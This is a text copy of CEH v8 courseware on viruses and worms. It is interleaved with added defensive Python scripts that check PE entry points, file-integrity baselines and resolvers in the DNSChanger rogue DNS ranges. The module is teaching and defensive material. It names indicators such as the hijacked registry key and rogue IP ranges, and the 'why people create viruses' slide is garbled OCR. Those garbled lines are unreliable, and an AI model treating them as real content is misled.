Viruses and Worms

Module 07

Ethical Hacking and Countermeasures: Viruses and Worms
Exam 312-50 Certified Ethical Hacker

Engineered by Hackers. Presented by Professionals.

Ethical Hacking and Countermeasures v8
Module 07: Viruses and Worms
Exam 312-50

Module 07 Page 1007

Ethical Hacking and Countermeasures Copyright by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.


Security News

October 19, 2012

Global Cyber-Warfare Tactics: New Flame-linked Malware used in Cyber-Espionage

http://www.globalresearch.ca

Security News: Global Cyber-Warfare Tactics: New Flame-linked Malware used in Cyber-Espionage

Source: http://www.globalresearch.ca

A new cyber espionage program linked to the notorious Flame and Gauss malware has been detected by Russia's Kaspersky Lab. The antivirus giant's chief warns that global cyber warfare is in "full swing" and will probably escalate in 2013. The virus, dubbed miniFlame, and also known as SPE, has already infected computers in Iran, Lebanon, France, the United States, and Lithuania. It was discovered in July 2012 and is described as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a statement posted on its website. The malware was originally identified as an appendage of Flame, the program used for targeted cyber espionage in the Middle East and acknowledged to be part of joint US-Israeli efforts to undermine Iran's nuclear program.

But later, Kaspersky Lab analysts discovered that miniFlame is an "interoperable tool that could be used as an independent malicious program, or concurrently as a plug-in for both the Flame and Gauss malware." The analysis also showed new evidence of cooperation between the creators of Flame and Gauss, as both viruses can use miniFlame for their operations. "MiniFlame's ability to be used as a plug-in by either Flame or Gauss clearly connects the collaboration between the development teams of both Flame and Gauss. Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory," Kaspersky Lab said.

High-precision attack tool

So far just 50 to 60 cases of infection have been detected worldwide, according to Kaspersky Lab. But unlike Flame and Gauss, miniFlame is meant for installation on machines already infected by those viruses. "MiniFlame is a high-precision attack tool. Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyber attack," Kaspersky's Chief Security Expert Alexander Gostev explained. "First, Flame or Gauss are used to infect as many victims as possible to collect large quantities of information. After data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage." The newly-discovered malware can also take screenshots of an infected computer while it is running a specific program or application such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client. Kaspersky Lab believes miniFlame's developers have probably created dozens of different modifications of the program. "At this time, we have only found six of these, dated 2010-2011," the firm said.

Cyber warfare in full swing

Meanwhile, Kaspersky Lab's co-founder and CEO Eugene Kaspersky warned that global cyber warfare tactics are becoming more sophisticated while also becoming more threatening. He urged governments to work together to fight cyber warfare and cyber-terrorism, Xinhua news agency reports. Speaking at an International Telecommunication Union Telecom World conference in Dubai, the antivirus tycoon said, "cyber warfare is in full swing and we expect it to escalate in 2013." "The latest malicious virus attack on the world's largest oil and gas company, Saudi Aramco, last August shows how dependent we are today on the Internet and information technology in general, and how vulnerable we are," Kaspersky said. He stopped short of blaming any particular player behind the massive cyber-attacks across the Middle East, pointing out that "our job is not to identify hackers or cyber-terrorists. Our firm is like an X-ray machine, meaning we can scan and identify a problem, but we cannot say who or what is behind it." Iran, who confirmed that it suffered an attack by Flame malware that caused severe data loss, blames the United States and Israel for unleashing the cyber-attacks.

Copyright 2005-2012 GlobalResearch.ca

By Russia Today
http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-in-cyber-espionage/5308867


Module Objectives

The objective of this module is to expose you to the various viruses and worms available today. It gives you information about all the available viruses and worms. This module examines the workings of a computer virus, its function, classification, and the manner in which it affects systems. This module will go into detail about the various countermeasures available to protect against these virus infections. The main objective of this module is to educate you about the available viruses and worms, indications of their attack and the ways to protect against various viruses, and testing your system or network against the presence of viruses or worms. This module will familiarize you with:

- Introduction to Viruses
- Stages of Virus Life
- Working of Viruses
- Indications of Virus Attack
- How Does a Computer Get Infected by Viruses?
- Virus Analysis
- Types of Viruses
- Virus Maker
- Computer Worms
- Worm Analysis
- Worm Maker
- Malware Analysis Procedure
- Online Malware Analysis Services
- Virus and Worms Countermeasures
- Antivirus Tools
- Penetration Testing for Virus


Module Flow

This section introduces you to various viruses and worms available today and gives you a brief overview of each virus and statistics of viruses and worms in the recent years. It lists various types of viruses and their effects on your system. The working of viruses in each phase will be discussed in detail. The techniques used by the attacker to distribute malware on the web are highlighted.

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing


Introduction to Viruses

- A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document
- Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments

Virus Characteristics:

- Infects Other Programs
- Alters Data
- Transforms Itself
- Corrupts Files and Programs
- Encrypts Itself
- Self Propagates

Computer viruses have the potential to wreak havoc on both business and personal computers. Worldwide, most businesses have been infected at some point. A virus is a self-replicating program that produces its own code by attaching copies of it into other executable codes. This virus operates without the knowledge or desire of the user. Like a real virus, a computer virus is contagious and can contaminate other files. However, viruses can infect outside machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met. There are three categories of malicious programs:

- Trojans and rootkits
- Viruses
- Worms

A worm is a malicious program that can infect both local and remote machines. Worms spread automatically by infecting system after system in a network, and even spreading further to other networks. Therefore, worms have a greater potential for causing damage because they do not rely on the user's actions for execution. There are also malicious programs in the wild that contain all of the features of these three malicious programs.


Virus and Worm Statistics

Source: http://www.av-test.org

This graphical representation gives detailed information of the attacks that have occurred in the recent years. According to the graph, only 11,666,667 systems were affected by viruses and worms in the year 2008, whereas in the year 2012, the count drastically increased to 70,000,000 systems, which means that the growth of malware attacks on systems is increasing exponentially year by year.

FIGURE 7.1: Virus and Worm Statistics (bar chart; y-axis: affected systems, 0 to 75,000,000 in steps of 15,000,000; x-axis: years 2008, 2009, 2010, 2011, 2012; source http://www.av-test.org)


Stages of Virus Life

Computer virus attacks spread through various stages from inception to design to elimination.

1. Design: A virus code is developed by using programming languages or construction kits. Anyone with basic programming knowledge can create a virus.
2. Replication: A virus first replicates itself within a target system over a period of time and then spreads itself.
3. Launch: It is activated when a user performs certain actions such as triggering or running an infected program.
4. Detection: A virus is identified as a threat infecting target systems. Its actions cause considerable damage to the target system's data.
5. Incorporation: Antivirus software developers assemble defenses against the virus.
6. Elimination: Users are advised to install antivirus software updates and eliminate the virus threats, thus creating awareness among user groups.


Working of Viruses: Infection Phase

In the infection phase, the virus replicates itself and attaches to an .exe file in the system.

Viruses attack a target host's system by using various methods. They attach themselves to programs and transmit themselves to other programs by making use of certain events. Viruses need such events to take place since they cannot:

- Self start
- Infect other hardware
- Cause physical damage to a computer
- Transmit themselves using non-executable files

Generally viruses have two phases, the infection phase and the attack phase. In the infection phase, the virus replicates itself and attaches to an .exe file in the system. Programs modified by a virus infection can enable virus functionalities to run on that system. Viruses get enabled as soon as the infected program is executed, since the program code leads to the virus code. Virus writers have to maintain a balance among factors such as:

- How will the virus infect?
- How will it spread?
- How will it reside in a target computer's memory without being detected?

Obviously, viruses have to be triggered and executed in order to function. There are many ways to execute programs while a computer is running. For example, any setup program calls for numerous programs that may be built into a system, and some of these are distribution medium programs. Thus, if a virus program already exists, it can be activated with this kind of execution and infect the additional setup program as well. There are virus programs that infect and keep spreading every time they are executed. Some programs do not infect other programs when first executed. They reside in a computer's memory and infect programs at a later time. Such virus programs, known as TSR (terminate-and-stay-resident) viruses, wait for a specified trigger event to spread at a later stage. It is, therefore, difficult to recognize which event might trigger the execution of a dormant virus infection. Refer to the figure that follows to see how the EXE file infection works. In the following figure, the .EXE file's header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file's header can activate the virus code too, along with the application program as soon as it is run.

- A file virus infects by attaching itself to an executable system application program. Text files such as source code, batch files, script files, etc., are considered potential targets for virus infections.
- Boot sector viruses execute their own code in the first place before the target PC is booted.

FIGURE 7.2: Working of Viruses in Infection Phase (Before Infection: Clean File and Virus; After Infection: Infected .exe File)
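The passage above says that an infected .EXE's header now hands control to the virus code as well as to the application. On a Windows PE file that handoff is a single header field, AddressOfEntryPoint, so a defender can check where it points. The Python below is an added example written for this page, not EC-Council's code and not a tool the module describes: it parses a PE header with only the standard library and flags the classic anomalies of an appending file infector (entry point in the last section, in a writable section, or outside every section). The two images it inspects are constructed in memory as headers only, with no program code, and their section names and layout are assumptions.

```python
import struct
from dataclasses import dataclass

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    characteristics: int

    def contains(self, rva: int) -> bool:
        return self.virtual_address <= rva < self.virtual_address + self.virtual_size


def parse_pe(data: bytes):
    """Return (AddressOfEntryPoint, [Section, ...]) read from a PE image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)      # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                     # IMAGE_FILE_HEADER (20 bytes)
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20                                         # IMAGE_OPTIONAL_HEADER
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)  # AddressOfEntryPoint
    sections, off = [], opt + opt_size                      # section table follows the optional header
    for _ in range(num_sections):
        name, vsize, vaddr, *_rest, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, chars))
        off += 40
    return entry_rva, sections


def entry_point_findings(data: bytes) -> list:
    """Heuristics on where the entry point lands; an empty list means nothing looked odd."""
    entry_rva, sections = parse_pe(data)
    owner = next((s for s in sections if s.contains(entry_rva)), None)
    if owner is None:
        return [f"entry point 0x{entry_rva:x} lies outside every section"]
    findings = []
    if not owner.characteristics & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point in non-executable section {owner.name}")
    if owner.characteristics & IMAGE_SCN_MEM_WRITE:
        findings.append(f"entry section {owner.name} is writable and executable")
    if len(sections) > 1 and owner is sections[-1]:
        findings.append(f"entry point in last section {owner.name}, typical of appended code")
    return findings


def build_sample_pe(sections, entry_rva: int) -> bytes:
    """Constructed test data: PE32 headers with the given section table and no code at all."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                   # e_lfanew: PE signature right after DOS header
    opt_size = 224                                          # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Constructed clean layout: the entry point sits inside .text.
CLEAN_IMAGE = build_sample_pe([(".text", 0x1000, 0x2000, CODE), (".data", 0x3000, 0x1000, DATA)], 0x1200)
# Constructed suspect layout: an extra writable+executable last section (assumed name ".added") owns the entry point.
SUSPECT_IMAGE = build_sample_pe(
    [(".text", 0x1000, 0x2000, CODE), (".data", 0x3000, 0x1000, DATA),
     (".added", 0x4000, 0x0500, CODE | IMAGE_SCN_MEM_WRITE)],
    0x4010,
)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_IMAGE), ("suspect", SUSPECT_IMAGE)):
        print(label, entry_point_findings(image) or ["no findings"])
```

To run this over a real file, pass `open(path, "rb").read()` to `entry_point_findings`. Treat the output as a triage signal rather than a verdict: packers and some compilers legitimately place the entry point in a late section, so a hit means "look closer", and a clean result only says this one heuristic found nothing.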



Working of Viruses: Attack Phase

- Viruses are programmed with trigger events to activate and corrupt systems
- Some viruses infect each time they are run and others infect only when a certain predefined condition is met, such as a user's specific task, a day, time, or a particular event

Once viruses spread themselves throughout the target system, they start corrupting the files and programs of the host system. Some viruses have trigger events that need to be activated to corrupt the host system. Some viruses have bugs that replicate themselves, and perform activities such as deleting files and increasing session time. They corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform actions such as:

- Deleting files and altering content in data files, thereby causing the system to slow down
- Performing tasks not related to applications, such as playing music and creating animations

FIGURE 7.3: Working of Viruses in Attack Phase (Unfragmented File Before Attack: File A, pages 1, 2, 3 and File B, pages 1, 2, 3, each stored consecutively; File Fragmented Due to Virus Attack: Page 1 File A, Page 3 File B, Page 1 File B, Page 3 File A, Page 2 File B, Page 2 File A)

Refer to this figure, which has two files, A and B. In section one, the two files are located one after the other in an orderly fashion. Once a virus code infects the file, it alters the positioning of the files that were consecutively placed, thus leading to inaccuracy in file allocations, causing the system to slow down as users try to retrieve their files. In this phase:

- Viruses execute when some events are triggered
- Some execute and corrupt via built-in bug programs after being stored in the host's memory
- Most viruses are written to conceal their presence, attacking only after spreading in the host to the fullest extent


h y

D o

P e o p le

C r e a t e

C o m

p u t e r

r
UrtifWd

c | ttkiul

u
Km Im

V ir u s e s

o m

p u t e r V ir u s e s

I n f lic t d a m a g e t o c o m p e tito r s

F in a n c ia l b e n e fits

R e s e a rc h p r o je c ts

P la y p r a n k

J J J

V a n d a lis m

C y b e r te r r o r is m

D is tr ib u te p o litic a l m e ssa g e s
V u ln e r a b le S y s te m

C o p y rig h t b y E & C a u a c tl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .

W h y

D o

P e o p le

C re a te

C o m p u te r V ir u s e s ?

S o u rc e : h t t p : / / w w w . s e c u r i t y d o c s . c o m C o m p u t e r v iru s e s a re n o t s e lf - g e n e r a t e d , b u t a re c r e a te d b y c y b e r - c r i m i n a l m in d s , i n t e n t i o n a l l y d e s ig n e d t o ca use d e s t r u c t i v e o c c u r r e n c e s in a s y s te m . G e n e ra lly , v iru s e s a re c r e a te d w i t h a d is r e p u t a b l e m o t i v e . C y b e r - c r im i n a l s c r e a te v iru s e s t o d e s t r o y a c o m p a n y 's d a ta , as an a c t o f v a n d a lis m o r a p ra n k , o r t o d e s t r o y a c o m p a n y 's p r o d u c ts . H o w e v e r , in s o m e cases, v iru s e s are a c t u a lly in te n d e d to be g o o d fo r a s y s te m . T he se a re d e s ig n e d to im p ro v e a s y s te m 's

p e r f o r m a n c e b y d e l e t in g p r e v io u s ly e m b e d d e d v iru s e s f r o m files. S o m e r e a s o n s v iru s e s h a v e b e e n w r i t t e n in c lu d e : e 0 0 0 0 I n flic t d a m a g e t o c o m p e t i t o r s R esearch p r o je c ts Pranks V a n d a lis m A t t a c k t h e p r o d u c t s o f s p e c ific c o m p a n i e s D is t r i b u t e p o litic a l m essa ge s F ina ncia l g ain

- Identity theft
- Spyware
- Cryptoviral extortion


Indications of Virus Attacks

- Processes take more resources and time
- Computer slows down when programs start
- Computer freezes frequently or encounters errors

An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, can infect the machines of the users who receive them. A virus can also make good use of file servers in order to infect files. The following are indications of a virus attack on a computer system:

- Programs take longer to load
- The hard drive is always full, even without installing any programs
- The floppy disk drive or hard drive runs when it is not being used
- Unknown files keep appearing on the system
- The keyboard or the computer emits strange or beeping sounds
- The computer monitor displays strange graphics
- File names turn strange, often beyond recognition
- The hard drive becomes inaccessible when trying to boot from the floppy drive
- A program's size keeps changing
- The memory on the system seems to be in use and the system slows down
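A baseline-and-compare check for two of the indications above (a program's size keeps changing; unknown files keep appearing), added here as an example and not part of the module; the directory, file names and file contents it uses are constructed for the demonstration.

```python
"""Baseline-and-compare check for program files.

Added example, not part of the EC-Council module. The temporary directory,
file names and contents below are constructed for the demonstration.
"""
import hashlib
import os
import tempfile


def fingerprint(path):
    """Return (size_in_bytes, sha256_hex) for one file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return os.path.getsize(path), h.hexdigest()


def build_baseline(root, extensions=(".exe", ".dll", ".com", ".sys")):
    """Fingerprint every file under root whose extension is on the watch list."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = fingerprint(full)
    return baseline


def compare(baseline, current):
    """Classify differences between an earlier and a later baseline.

    'grown'    : same name, size increased (the "program's size keeps changing"
                 symptom; an add-on virus leaves exactly this trace)
    'modified' : hash differs without growth (in-place overwrite)
    'new'      : file present now that was not in the baseline
    'missing'  : file gone since the baseline
    """
    report = {"grown": [], "modified": [], "new": [], "missing": []}
    for rel, (size, digest) in current.items():
        if rel not in baseline:
            report["new"].append(rel)
            continue
        old_size, old_digest = baseline[rel]
        if size > old_size:
            report["grown"].append(rel)
        elif digest != old_digest:
            report["modified"].append(rel)
    report["missing"] = sorted(set(baseline) - set(current))
    return report


def demo():
    """Constructed scenario: take a baseline, then simulate two symptoms."""
    root = tempfile.mkdtemp(prefix="baseline_demo_")
    with open(os.path.join(root, "calc.exe"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 510)   # constructed stand-in for a program
    with open(os.path.join(root, "notes.txt"), "wb") as f:
        f.write(b"not watched")          # .txt is outside the watch list
    before = build_baseline(root)

    # Simulated symptoms: the program grows, and an unknown executable appears.
    with open(os.path.join(root, "calc.exe"), "ab") as f:
        f.write(b"\x90" * 64)
    with open(os.path.join(root, "unknown.exe"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 10)
    after = build_baseline(root)
    return compare(before, after)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is taken on a known-clean system and stored off-box, so that a virus cannot rewrite it along with the files it infects.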


How Does a Computer Get Infected by Viruses?

- When a user accepts files and downloads without checking properly for the source
- Opening infected e-mail attachments
- Installing pirated software
- Not updating and not installing new versions of plug-ins
- Not running the latest anti-virus application

How Does a Computer Get Infected by Viruses?

There are many ways in which a computer gets infected by viruses. The most popular methods are as follows:

- When a user accepts files and downloads without checking properly for the source. Attackers usually send virus-infected files as email attachments to spread the virus on the victim's system. If the victim opens the mail, the virus automatically infects the system.
- Attackers incorporate viruses in popular software programs and upload the infected software on websites intended to download software. When the victim downloads the infected software and installs it, the system gets infected.
- Failing to install new versions or update with the latest patches intended to fix the known bugs may expose your system to viruses.
- With the increasing technology, attackers also are designing new viruses. Failing to use the latest antivirus applications may expose you to virus attacks.


Common Techniques Used to Distribute Malware on the Web

Source: Security Threat Report 2012 (http://www.sophos.com)

- Blackhat Search Engine Optimization (SEO): Ranking malware pages highly in search results
- Social Engineered Click-jacking: Tricking users into clicking on innocent-looking webpages
- Spearphishing Sites: Mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials
- Malvertising: Embedding malware in ad-networks that display across hundreds of legitimate, high-traffic sites
- Compromised Legitimate Websites: Hosting embedded malware that spreads to unsuspecting visitors
- Drive-by Downloads: Exploiting flaws in browser software to install malware just by visiting a web page

Common Techniques Used to Distribute Malware on the Web

Source: Security Threat Report 2012 (http://www.sophos.com)

- Blackhat Search Engine Optimization (SEO): Using this technique the attacker ranks malware pages high in search results
- Social Engineered Click-jacking: The attackers trick the users into clicking on innocent-looking web pages that contain malware
- Spearphishing Sites: This technique is used for mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials
- Malvertising: Embeds malware in ad networks that display across hundreds of legitimate, high-traffic sites
- Compromised Legitimate Websites: Host embedded malware that spreads to unsuspecting visitors
- Drive-by Downloads: The attacker exploits flaws in browser software to install malware just by visiting a web page


Virus Hoaxes and Fake Antiviruses

- Hoaxes are false alarms claiming reports about a non-existing virus, which may contain virus attachments
- Attackers disguise malware as an antivirus and trick users into installing it on their systems. Once installed, these fake antiviruses can damage target systems similar to other malware
- Warning messages propagating that a certain email message should not be viewed and that doing so will damage one's system


Virus Hoaxes and Fake Antiviruses

Virus Hoaxes

A virus hoax is simply a bluff. Viruses, by their nature, have always created a horrifying impression. Hoaxes are typically untrue scare alerts that unscrupulous individuals send to create havoc. It is fairly common for innocent users to pass these phony messages along thinking they are helping others avoid the "virus."

- Hoaxes are false alarms claiming reports about non-existing viruses
- These warning messages, which can be propagated rapidly, state that a certain email message should not be opened, and that doing so would damage one's system
- In some cases, these warning messages themselves contain virus attachments
- These possess the capability of vast destruction on target systems

Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to be somewhat of an expert to spread hoaxes in order to avoid being identified and caught. Therefore, it is a good practice to look for technical details about how to become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.


Try to cross check the identity of the person who has posted the warning. Also look for more information about the hoax/warning from secondary sources. Before jumping to conclusions by reading certain documents on the Internet, check the following:

- If it is posted by newsgroups that are suspicious, cross check the information with another source
- If the person who has posted the news is not a known person in the community or an expert, cross check the information with another source
- If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation
- One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites
- If the posting is technical, hunt for sites that would cater to the technicalities, and try to authenticate the information

Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS

PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS! You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEIJING' or 'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. COPY THIS EMAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US. End-of-mail Thanks.

FIGURE 7.3: Hoaxes Warning Message

Fake Antiviruses

Fake antivirus is a method hackers use to affect a system; it can poison your system and break the registry and system files to allow the attacker to take full control of and access to your computer. It appears and performs similarly to a real antivirus program. Fake antivirus programs first appear on different browsers and warn users that they have different security threats on their system, and this message is backed up by real suspicious viruses. When the user tries to remove the viruses, they are navigated to another page where they need to buy or subscribe to that antivirus and proceed to payment details. These fake antivirus programs have been fabricated in such a way that they draw the attention of the unsuspecting user into installing the software. Some of the methods used to extend the usage and installation of fake antivirus programs include:

- Email and messaging: Attackers use spam email and social networking messages to spread this type of infected email to users and prompt the user to open the attachments for software installation.


- Search engine optimization: Attackers generate pages related to public or current search terms and plant them to appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus.
- Compromised websites: Attackers secretly break into popular sites to install the fake antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.

[Figure 7.4: screenshot of a fake antivirus window with Protection and Privacy tabs and a "Path" column listing a flagged file]

FIGURE 7.4: Example of a Fake Antivirus


Virus Analysis: DNSChanger

- DNSChanger (Alureon) modifies the DNS settings on the victim PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information
- It acts as a bot and can be organized into a BotNet and controlled from a remote location
- It spreads through emails, social engineering tricks, and untrusted downloads from the Internet
- DNSChanger malware achieves the DNS redirection by modifying the following registry key setting against an interface device such as a network card:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%RandomCLSID%\NameServer

- DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that as part of the BotNet takedown the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names

http://www.totaldefense.com

Virus Analysis: DNSChanger

Source: http://www.totaldefense.com

DNSChanger (Alureon) is malware that spreads through emails, social engineering tricks, and untrusted downloads from the Internet. It acts as a bot and can be organized into a botnet and controlled from a remote location. This malware achieves DNS redirection by modifying the system registry key settings against an interface device such as a network card. DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that as part of the botnet takedown, the FBI took ownership of rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names. It can even modify the DNS settings on the victim's PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.


Virus Analysis: DNSChanger (Contd)

The rogue DNS servers can exist in any of the following ranges:

64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255

[Slide diagram: DNSChanger infects the victim's computer by changing her DNS IP address to 64.28.176.2; the attacker runs a DNS server in Russia (IP: 64.28.176.2); DNSChanger sniffs the credential and redirects the request to the real website www.xsecurity.com (IP: 200.0.0.45)]

http://www.totaldefense.com

Virus Analysis: DNSChanger (Contd)

Source: http://www.totaldefense.com

The rogue DNS servers can exist in any of the following ranges:

64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255


[Figure 7.5 diagram: the victim sends the DNS request "What is the IP address of www.xsecurity.com?" to 64.28.176.2; DNSChanger has infected the victim's computer by changing her DNS IP address to 64.28.176.2; the attacker runs a DNS server in Russia (IP: 64.28.176.2) and answers with the fake website at IP 65.0.0.2; DNSChanger sniffs the credential and redirects the request to the real website www.xsecurity.com (IP: 200.0.0.45)]

FIGURE 7.5: Virus Analysis Using DNSChanger

To infect the system and steal credentials, the attacker has to first run a DNS server. Here the attacker runs his or her DNS server in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing his or her DNS IP address to 64.28.176.2. When this malware has infected the system, it entirely changes the DNS settings of the infected machine and forces all DNS requests to go to the DNS server run by the attacker. After altering the setting of the DNS, any request that is made by the system is sent to the malicious DNS server. Here, the victim sent the DNS request "What is the IP address of www.xsecurity.com?" to 64.28.176.2. The attacker gave a response to the request as www.xsecurity.com, which is located at 65.0.0.2. When the victim's browser connects to 65.0.0.2, it redirects him or her to a fake website created by the attacker with IP 65.0.0.2. DNSChanger sniffs the credentials (username, passwords) and redirects the request to the real website (www.xsecurity.com) with IP 200.0.0.45.
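A defender-side check for the registry setting and the rogue address ranges described above, added here as an example and not part of the module or of totaldefense.com: it parses NameServer values, tests each resolver against the six rogue ranges, and on Windows reads the interface subkeys under the key the slide names. The interface GUIDs and resolver values in the sample are constructed; the Windows read path is an assumption about how the value is laid out.

```python
"""Check configured DNS resolvers against the DNSChanger rogue ranges.

Added example, not part of the EC-Council module. Sample interface settings
below are constructed for the demonstration.
"""
import ipaddress
import sys

# The six ranges given on the preceding slide (first address - last address).
ROGUE_RANGES = [
    ("64.28.176.0", "64.28.191.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("85.255.112.0", "85.255.127.255"),
    ("213.109.64.0", "213.109.79.255"),
]

# Registry location named on the slide; each interface subkey carries a
# NameServer value that DNSChanger rewrites.
INTERFACES_KEY = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"


def rogue_range_for(ip):
    """Return the (first, last) rogue range containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for first, last in ROGUE_RANGES:
        if ipaddress.ip_address(first) <= addr <= ipaddress.ip_address(last):
            return first, last
    return None


def parse_nameserver_value(value):
    """NameServer is a string of resolvers separated by commas or spaces."""
    return [tok for tok in value.replace(",", " ").split() if tok]


def audit(interfaces):
    """interfaces: {interface_id: NameServer string}.

    Returns [(interface_id, resolver, (first, last))] for every resolver that
    falls inside a rogue range. Non-IP tokens and IPv6 resolvers are skipped.
    """
    findings = []
    for iface, value in interfaces.items():
        for resolver in parse_nameserver_value(value):
            try:
                hit = rogue_range_for(resolver)
            except (ValueError, TypeError):
                continue
            if hit:
                findings.append((iface, resolver, hit))
    return findings


def read_windows_interfaces():
    """Collect NameServer from every interface subkey (Windows only)."""
    import winreg
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, INTERFACES_KEY) as root:
        index = 0
        while True:
            try:
                sub = winreg.EnumKey(root, index)
            except OSError:
                break                      # no more subkeys
            index += 1
            with winreg.OpenKey(root, sub) as key:
                try:
                    value, _ = winreg.QueryValueEx(key, "NameServer")
                except FileNotFoundError:
                    continue               # interface uses DHCP-assigned DNS
                if value:
                    result[sub] = value
    return result


# Constructed sample mirroring Figure 7.5: one interface pointed at the
# attacker's resolver, one left on an ordinary internal resolver.
SAMPLE_INTERFACES = {
    "{11111111-2222-3333-4444-555555555555}": "64.28.176.2",
    "{66666666-7777-8888-9999-000000000000}": "10.0.0.1,10.0.0.2",
}

if __name__ == "__main__":
    data = read_windows_interfaces() if sys.platform == "win32" else SAMPLE_INTERFACES
    for iface, resolver, (first, last) in audit(data):
        print(f"{iface}: resolver {resolver} is inside rogue range {first}-{last}")
```

A resolver inside one of these ranges on an unexpected interface is the condition the FBI-operated replacement servers were standing in for; the remediation is to restore the legitimate resolver and clean the infection, not only to edit the value.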


Module Flow

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
